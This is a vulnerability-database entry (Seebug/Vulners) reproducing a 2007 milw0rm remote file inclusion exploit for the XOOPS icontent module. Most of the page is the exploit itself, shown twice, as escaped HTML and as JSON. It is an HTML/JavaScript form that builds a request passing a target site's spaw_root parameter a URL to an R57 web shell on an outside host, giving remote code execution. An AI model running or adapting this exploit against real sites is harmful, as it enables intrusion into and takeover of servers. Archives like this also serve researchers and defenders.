Search...

XOOPS Module icontent 1.0/4.5 - Remote File Inclusion Exploit

2014-07-01T00:00:00

ID SSV:64736
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                &#60;html&#62;
&#60;head&#62;
&#60;meta http-equiv=&#34;Content-Type&#34; content=&#34;text/html; charset=windows-1254&#34;&#62;
&#60;title&#62;XOOPS Module icontent v.1.0 Remote File Inclusion Exploit&#60;/title&#62;

&#60;script language=&#34;JavaScript&#34;&#62;

//&#39;===============================================================================================
//&#39;[Script Name: XOOPS Module icontent v.1.0
//&#39;[Author     : Mahmood_ali
//&#39;[S.Page     : http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip
//&#39;===============================================================================================

//&#39;[[V.Code]]------------------------------------------------------
//&#39;
//&#39;include $spaw_root.&#39;config/spaw_control.config.php&#39;;
//&#39;include $spaw_root.&#39;class/toolbars.class.php&#39;;
//&#39;include $spaw_root.&#39;class/lang.class.php&#39;;
//&#39;
//&#39;[[V.Code]]---------------------------------------------------------

//# Tryag.Com
//# ...




   var path=&#34;/modules/icontent/include/wysiwyg/&#34;
   var adres=&#34;spaw_control.class.php&#34; //File name
   var acik =&#34;?spaw_root=&#34; // Line 15
   var shell=&#34;http://lppm.uns.ac.id/r57.txt?&#34; // R57Shell

   function command(){
       if (document.rfi.target1.value==&#34;&#34;){
          alert(&#34;Failed..&#34;);
      return false;
    }



  rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
  rfi.submit(); // Form Submit
   }
&#60;/script&#62;

&#60;/head&#62;

&#60;body bgcolor=&#34;#000000&#34;&#62;
&#60;center&#62;

&#60;p&#62;&#60;b&#62;&#60;font face=&#34;Arial&#34; size=&#34;2&#34; color=&#34;#FFFFFF&#34;&#62;XOOPS Module icontent 
v.1.0 Remote File Inclusion Exploit&#60;/font&#62;&#60;/b&#62;&#60;/p&#62;

&#60;p&#62;&#60;/p&#62;
&#60;form method=&#34;post&#34; target=&#34;getting&#34; name=&#34;rfi&#34; onSubmit=&#34;command();&#34;&#62;
    &#60;b&#62;&#60;font face=&#34;Tahoma&#34; size=&#34;1&#34; color=&#34;#FF0000&#34;&#62;Target:&#60;/font&#62;&#60;font 
face=&#34;Tahoma&#34; size=&#34;1&#34; 
color=&#34;#FFFF00&#34;&#62;[http://[target]/[scriptpath]&#60;/font&#62;&#60;font color=&#34;#00FF00&#34; 
size=&#34;2&#34; face=&#34;Tahoma&#34;&#62;
  &#60;/font&#62;&#60;font color=&#34;#FF0000&#34; size=&#34;2&#34;&#62;&nbsp;&#60;/font&#62;&#60;/b&#62;
  &#60;input type=&#34;text&#34; name=&#34;target1&#34; size=&#34;20&#34; style=&#34;background-color: 
#808000&#34; onmouseover=&#34;javascript:this.style.background=&#39;#808080&#39;;&#34; 
onmouseout=&#34;javascript:this.style.background=&#39;#808000&#39;;&#34;&#62;&#60;/p&#62;
  &#60;p&#62;&#60;input type=&#34;submit&#34; value=&#34;Gonder&#34; name=&#34;B1&#34;&#62;&#60;input type=&#34;reset&#34; 
value=&#34;Sifirla&#34; name=&#34;B2&#34;&#62;&#60;/p&#62;
&#60;/form&#62;
&#60;p&#62;&#60;br&#62;
&#60;iframe name=&#34;getting&#34; height=&#34;337&#34; width=&#34;633&#34; scrolling=&#34;yes&#34; 
frameborder=&#34;0&#34;&#62;&#60;/iframe&#62;
&#60;/p&#62;

&#60;b&#62;&#60;font face=&#34;Lucida Handwriting&#34; size=&#34;5&#34; 
color=&#34;#FF0000&#34;&#62;Mahmood_ali&#60;/font&#62;&#60;/b&#62;&#60;p&#62;
&#60;b&#62;&#60;a href=&#34;http://tryag.com/cc&#34;&#62;
&#60;font face=&#34;Lucida Handwriting&#34; size=&#34;5&#34; 
color=&#34;#FFFFFF&#34;&#62;TrYaG-Team&#60;/font&#62;&#60;/a&#62;&#60;/b&#62;&#60;/p&#62;
&#60;/p&#62;
&#60;/center&#62;
&#60;/body&#62;

&#60;/html&#62;

# milw0rm.com [2007-06-01]

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-64736", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "XOOPS Module icontent 1.0/4.5 - Remote File Inclusion Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64736", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n <html>\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">\r\n<title>XOOPS Module icontent v.1.0 Remote File Inclusion Exploit</title>\r\n\r\n<script language="JavaScript">\r\n\r\n//'===============================================================================================\r\n//'[Script Name: XOOPS Module icontent v.1.0\r\n//'[Author : Mahmood_ali\r\n//'[S.Page : http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip\r\n//'===============================================================================================\r\n\r\n//'[[V.Code]]------------------------------------------------------\r\n//'\r\n//'include $spaw_root.'config/spaw_control.config.php';\r\n//'include $spaw_root.'class/toolbars.class.php';\r\n//'include $spaw_root.'class/lang.class.php';\r\n//'\r\n//'[[V.Code]]---------------------------------------------------------\r\n\r\n//# Tryag.Com\r\n//# ...\r\n\r\n\r\n\r\n\r\n var path="/modules/icontent/include/wysiwyg/"\r\n var adres="spaw_control.class.php" //File name\r\n var acik ="?spaw_root=" // Line 15\r\n var shell="http://lppm.uns.ac.id/r57.txt?" // R57Shell\r\n\r\n function command(){\r\n if (document.rfi.target1.value==""){\r\n alert("Failed..");\r\n return false;\r\n }\r\n\r\n\r\n\r\n rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready\r\n rfi.submit(); // Form Submit\r\n }\r\n</script>\r\n\r\n</head>\r\n\r\n<body bgcolor="#000000">\r\n<center>\r\n\r\n<p><b><font face="Arial" size="2" color="#FFFFFF">XOOPS Module icontent \r\nv.1.0 Remote File Inclusion Exploit</font></b></p>\r\n\r\n<p></p>\r\n<form method="post" target="getting" name="rfi" onSubmit="command();">\r\n <b><font face="Tahoma" size="1" color="#FF0000">Target:</font><font \r\nface="Tahoma" size="1" \r\ncolor="#FFFF00">[http://[target]/[scriptpath]</font><font color="#00FF00" \r\nsize="2" face="Tahoma">\r\n </font><font color="#FF0000" size="2"> </font></b>\r\n <input type="text" name="target1" size="20" style="background-color: \r\n#808000" onmouseover="javascript:this.style.background='#808080';" \r\nonmouseout="javascript:this.style.background='#808000';"></p>\r\n <p><input type="submit" value="Gonder" name="B1"><input type="reset" \r\nvalue="Sifirla" name="B2"></p>\r\n</form>\r\n<p><br>\r\n<iframe name="getting" height="337" width="633" scrolling="yes" \r\nframeborder="0"></iframe>\r\n</p>\r\n\r\n<b><font face="Lucida Handwriting" size="5" \r\ncolor="#FF0000">Mahmood_ali</font></b><p>\r\n<b><a href="http://tryag.com/cc">\r\n<font face="Lucida Handwriting" size="5" \r\ncolor="#FFFFFF">TrYaG-Team</font></a></b></p>\r\n</p>\r\n</center>\r\n</body>\r\n\r\n</html>\r\n\r\n# milw0rm.com [2007-06-01]\r\n\n ", "id": "SSV:64736", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T16:57:07", "reporter": "Root", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T16:57:07", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:57:07", "rev": 2}, "vulnersScore": 0.2}, "references": [], "immutableFields": []}